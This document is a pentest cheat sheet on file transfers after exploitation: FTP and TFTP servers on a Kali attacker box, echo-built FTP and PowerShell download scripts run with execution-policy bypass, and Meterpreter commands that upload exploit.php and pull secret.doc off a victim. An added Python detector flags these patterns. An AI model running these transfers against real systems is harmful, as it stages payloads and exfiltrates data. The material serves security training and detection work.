10.6 : Web app exploitation - File transfers

Common File Transfer Methods

HTTP

  • Serve the files with nginx or Apache

FTP

  • Set up an FTP server with pyftpdlib (package python-pyftpdlib)

    cd /var/yourdir
    python -m pyftpdlib -p 21

  • Windows or Linux are both acceptable

    The lines written to ftp.txt are, in order: connect, username, password, binary mode, fetch the file, quit.

    echo open [kali ip] 21> ftp.txt
    echo USER anonymous>> ftp.txt
    echo pass>> ftp.txt
    echo bin>> ftp.txt
    echo GET [file]>> ftp.txt
    echo bye>> ftp.txt
    ftp -v -n -s:ftp.txt

TFTP

  • Windows XP, 2003

  • On Windows 7 or later, the TFTP client needs to be installed manually.

  • Attacker side
    mkdir /tftp
    atftpd --daemon --port 69 /tftp

  • Victim side
    tftp -i $SrcIP get $filePath

Linux

  • wget
  • curl
  • ftp

Windows

  • ftp
  • powershell
    echo $storageDir = $pwd >wget.ps1
    echo $webclient = New-Object System.Net.WebClient >>wget.ps1
    echo $url = "http://[kali ip]/[file]" >>wget.ps1
    echo $file = "[file]" >>wget.ps1
    echo $webclient.DownloadFile($url,$file) >>wget.ps1
    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1
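
Detection view of the Windows-side transfers above (the `ftp -s:` script, `tftp -i ... get`, and the echo-built wget.ps1 run with `-ExecutionPolicy Bypass`). This is an added example, not part of the original notes; the rule names, severity labels and sample lines are constructed, and it assumes each command is logged as its own process command line (for example through `cmd.exe /c`).

```python
import re

# Command-line patterns for the Windows-side transfers shown on this page.
RULES = {
    "ftp_script": re.compile(r"\bftp(?:\.exe)?\b.*\s-s:(?P<script>\S+)", re.I),
    "tftp_get": re.compile(r"\btftp(?:\.exe)?\b.*\s-i\s+\S+\s+get\s+\S+", re.I),
    "ps_policy_bypass": re.compile(
        r"\bpowershell(?:\.exe)?\b(?=.*-ExecutionPolicy\s+Bypass)"
        r"(?=.*-File\s+(?P<script>\S+))", re.I),
}
# "echo ... > file" / ">> file": a script being written one line at a time.
ECHO_STAGE = re.compile(r"\becho\s+(?P<body>.*?)\s*>{1,2}\s*(?P<file>[\w.\\:-]+)\s*$", re.I)
# Echoed content that looks like an FTP command script or a WebClient download.
BODY_HINTS = re.compile(r"Net\.WebClient|DownloadFile|^open\s|^GET\s", re.I)

def basename(path):
    return re.split(r"[\\/]", path)[-1].lower()

def scan(cmdlines):
    """Return (line_no, rule, severity) for each matching command line."""
    staged = {}  # script name -> count of suspicious echo lines written to it
    alerts = []
    for n, line in enumerate(cmdlines, 1):
        m = ECHO_STAGE.search(line)
        if m:
            name = basename(m["file"])
            staged[name] = staged.get(name, 0) + bool(BODY_HINTS.search(m["body"]))
            continue
        for rule, rx in RULES.items():
            m = rx.search(line)
            if m:
                script = basename(m.groupdict().get("script") or "")
                # "high" when the script that runs was echo-staged earlier.
                sev = "high" if staged.get(script, 0) else "medium"
                alerts.append((n, rule, sev))
    return alerts

SAMPLE = [  # constructed command lines (192.0.2.10 is a documentation address)
    r"cmd.exe /c echo open 192.0.2.10 21> ftp.txt",
    r"cmd.exe /c echo GET file.bin>> ftp.txt",
    r"cmd.exe /c ftp -v -n -s:ftp.txt",
    r"cmd.exe /c echo build ok >> build.log",
    r"tftp -i 192.0.2.10 get file.bin",
    r"cmd.exe /c echo $webclient = New-Object System.Net.WebClient >>wget.ps1",
    r"powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File wget.ps1",
    r"powershell.exe -ExecutionPolicy Bypass -File deploy.ps1",
]

if __name__ == "__main__":
    for alert in scan(SAMPLE):
        print(alert)
```

The echo-then-execute correlation is what separates the staged ftp.txt and wget.ps1 runs from an ordinary script launched with the same flags.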

Metasploit

  • A shell on the machine is needed first

  • Then open the meterpreter session with the sessions command and use:

    upload /var/www/html/exploit.php c:\Users\IEUser\exploit.php
    download c:\Users\IEUser\secret.doc /var/www/html/secret.doc